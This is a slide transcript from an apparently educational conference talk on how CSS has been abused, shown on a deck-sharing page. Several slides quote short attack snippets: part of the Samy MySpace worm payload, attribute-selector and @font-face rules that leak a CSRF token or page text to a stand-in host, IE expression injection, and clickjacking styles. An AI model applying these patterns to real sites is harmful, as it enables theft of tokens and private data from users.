Upgrade to Pro — share decks privately, control downloads, hide ads and more …

CSS For Good, Not Evil

36857c1095dccf2f2c5ea470dc791530?s=47 Stephen Hay
June 16, 2017
Design
2
960

CSS For Good, Not Evil

My talk on CSS security issues and a bit on dark UX, at CSS Day 2017 in Amsterdam

36857c1095dccf2f2c5ea470dc791530?s=128

Stephen Hay

June 16, 2017
Tweet

More Decks by Stephen Hay

See All by Stephen Hay
The Virtues of Low-fi
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
1
79
The Tail and Its Dog
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
1
270
From Deception to Clarity
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
4
480
Sculpting Text
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
4
630
Power Tools for Browser-Based Design (Artifact 2014)
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
6
460
The Zero Interface: Using Zero-based Thinking to Maintain Simplicity (FOWD London 2014)
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
2
480
Flexbox: One Giant Leap for Web Layout
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
6
350
The New Photoshop, Part 2: The Revenge of the Web (FEC13)
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
9
870
Flexbox: One Giant Leap for Web Layout
36857c1095dccf2f2c5ea470dc791530?s=48 stephenhay
5
140

Other Decks in Design

See All in Design
事業会社で映像をやることの面白さ・メリット等,中途入社だからこそわかったこと
2016ba6b977a2e6691811fa66d5f4336?s=48 cyberagentdevelopers
PRO
0
450
The Party! - Story Sequence
77b4173a70942a13969b84335c2e7695?s=48 diablicos_
0
150
Demon Deals Cast
D2e6593070e5853063aa7033d483e636?s=48 breadman
0
1.1k
UXとUIから知るプロダクトデザイン研修
635b0000e69f3203c8b41df47293d451?s=48 takumasaito
2
230
「IDOLY PRIDE」における新卒1年目のクリエイティブ
2016ba6b977a2e6691811fa66d5f4336?s=48 cyberagentdevelopers
PRO
0
510
dnd board
E07eafb41f4c23afbf5ca3fe1aa83b75?s=48 emmamsketches
1
210
ブランドイメージを戦略的に浸透させる VI策定プロセス
1db31cd7a801c73129dbce8163a49b08?s=48 sevendex
0
170
Омские улицы — 2022
3ed98d0c9704e28a7da4d5d7ea9c320f?s=48 roudakov
0
200
ユーザー体験を支える_freeeのデザインシステム活用.pdf
7dac484138925ba3e0b6f52932bdba56?s=48 fkady
1
1.1k
Forget-me-not
B9f1579b53c0fd588aa685f98d97076d?s=48 kackington
1
210
Детский парк Фили
E56b3a9f8228a4274e30ae739ecca06c?s=48 zapoimu
0
730
yamanohanabuta logoguideline
4a9fb6423c8832a316433031d06523f1?s=48 misamochimasu
0
200

Featured

See All Featured
Code Review Best Practice
3d6ace9554821d552146413bcdf874f6?s=48 trishagee
44
9.7k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
E195ae45320d9202eaa01c9f1d31a416?s=48 marktimemedia
15
980
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
B3d6434763caa0ef5dc4b792662c49f7?s=48 smashingmag
237
19k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
A9a491b0fcbe0fbce3d64063a37add99?s=48 rmw
21
1.4k
Six Lessons from altMBA
766b9746b59e6f09e280cd33cf4ed419?s=48 skipperchong
14
1.4k
Navigating Team Friction
245cee81a9c424266e5e401d844ea881?s=48 lara
175
11k
The MySQL Ecosystem @ GitHub 2015
Be9caeb9d4ef9944d151af909063ed6e?s=48 samlambert
239
11k
Fireside Chat
864a009ac73600c7c02e1f26629dd989?s=48 paigeccino
13
1.4k
YesSQL, Process and Tooling at Scale
D09fad3e36ae6841f54820be0e907f7a?s=48 rocio
157
12k
No one is an island. Learnings from fostering a developers community.
6bb82b13cda86d3b821fa44100335ddf?s=48 thoeni
9
1.3k
What's in a price? How to price your products and services
Dad095ea7038f89f760419ce475d5d14?s=48 michaelherold
229
9.4k
Designing for humans not robots
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
241
24k

Transcript

  1. CSS For Evil, Not Good. How style has been used

    to manipulate people, invade their privacy, steal their data, and other assorted nasty things. Stephen Hay, CSS Day 2017, Amsterdam
  2. None
  3. None

  4. catawiki.com/jobs

  5. MySpace

  6. None
  7. None
  8. None

  9. Samy

  10. In a relationship.

  11. In a relationship. hot

  12. None

  13. but most of all, Samy is 
 my hero By

    vissago / Dan Tentler - http://www.flickr.com/photos/vissago/4861025347/, CC BY 2.0, https://commons.wikimedia.org/w/index.php?curid=26085303

  14. <div id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34); …” </div> https://samy.pl/popular/tech.html http://www.securiteam.com/securitynews/6I00C2KEAA.html

  15. WTF https://motherboard.vice.com/en_us/article/the-myspace-worm-that-changed-the-internet-forever

  16. Samy didn’t have 
 evil intentions.

  17. I’m not a security expert.

  18. None

  19. There are different levels of evil.

  20. Level 1: Getting some 
 browsing history.

  21. weirdbutdead.com

  22. weirdbutdead.com getComputedStyle

  23. Boolean algebra & mix-blend-mode

  24. http://lcamtuf.coredump.cx/whack/ http://lcamtuf.coredump.cx/css_calc/

  25. Level 2 Mathias Bynens’ Evil Basement of Horrors

  26. Some Belgian kid 
 did a presentation… https://speakerdeck.com/mathiasbynens/3-dot-14-things-i-didnt-know-about-css-at-cssconf-dot-asia-2015

  27. Stealing DOM data

  28. <input type="hidden" name="csrf-token" id="csrf" value=“555…"> #csrf[value^="a"] { background: url(//evilmathias.example.com/?v=a); }

    #csrf[value^="b"] { background: url(//evilmathias.example.com/?v=b); } etc.

  29. Text-symbol leaking

  30. <div id=“my-dirtiest-secrets"> I think Javascript is OK </div> @font-face {

    font-family: evilmathias; src: url(//evilmathias.example.com/?v=A); unicode-range: U+0041; } #my-dirtiest-secrets { font-family: evilmathias; }

  31. Forcing IE=7 Expressions

  32. .foo { width: expression( alert(‘Bad Evil Mathias’) ); } <meta

    http-equiv="X-UA-Compatible" content="IE=7"> <iframe src=“https://target.example.com/page- with-css-payload”></iframe>

  33. Level 3 Path-relative 
 stylesheet import http://blog.portswigger.net/2015/02/prssi.html

  34. http://example.com/posts.php <link href="styles.css" rel="stylesheet" type="text/css" /> Blah blah blah *

    { width: expression( alert( ‘evil’ )) } http://example.com/posts.php/

  35. Level 4 Content replacement

  36. <style> nav {display: none;} </style> <div style”[various styles]”> Content </div>

  37. Oops: allow users to add <style>

  38. Allow users to add classes. Oops.

  39. Allow users to add classes. Oops.

  40. Level 5 UI Redressing “Clickjacking”

  41. LinkedIn

  42. .li_style { position: absolute; width: 100%; z-index: 10021; position: fixed;

    top: 0; left: 0; width: 100%; height: 100%; padding: 0; overflow-y: scroll; _overflow-y: hidden }

  43. {"content": "<p><a class=\"li_style\" href=\"http://www.example.com\">Example Site</a><img src=\"image.png\"/></p>"} - https://security.linkedin.com/blog-archive#11232015

  44. None

  45. Level 6 Phishing

  46. https://www.askdavetaylor.com/beware-the-latest-apple-id-phishing-attack/

  47. None
  48. None

  49. One thing going for us, at least for now: most

    scammers aren’t great designers.

  50. “Good” design works. Even for evil.

  51. Level 7 Dark Patterns Black Hat UX

  52. Sophisticated deceivers seem knowledgable about behaviour as well as technology.

  53. None

  54. Image: https://www.brignull.com/

  55. None
  56. None

  57. “Roach Motel”

  58. Unsubscribe…

  59. None
  60. None
  61. None

  62. Misdirection

  63. None
  64. None
  65. None
  66. None

  67. Confirmation of 
 desired behaviour

  68. Yes | No Yes | Not right now Yes |

    Maybe later There is a significant difference between these sets of choices.

  69. Exploiting 
 behavioural patterns

  70. None

  71. People who stand to gain something from you have motive

    to deceive.

  72. Level 8 Command execution 
 on a target system https://lifepluslinux.blogspot.nl/2017/01/look-before-you-paste-from-website-to.html

  73. None
  74. None

  75. When systems become more complex, the number of possible weaknesses

    can increase, yet become less apparent.

  76. What’s the
 takeaway here? Nothing.

  77. Is there a 
 positive message? No.

  78. Thank you! @stephenhay Special thanks to Mathias “Evil Belgian Kid”

    Bynens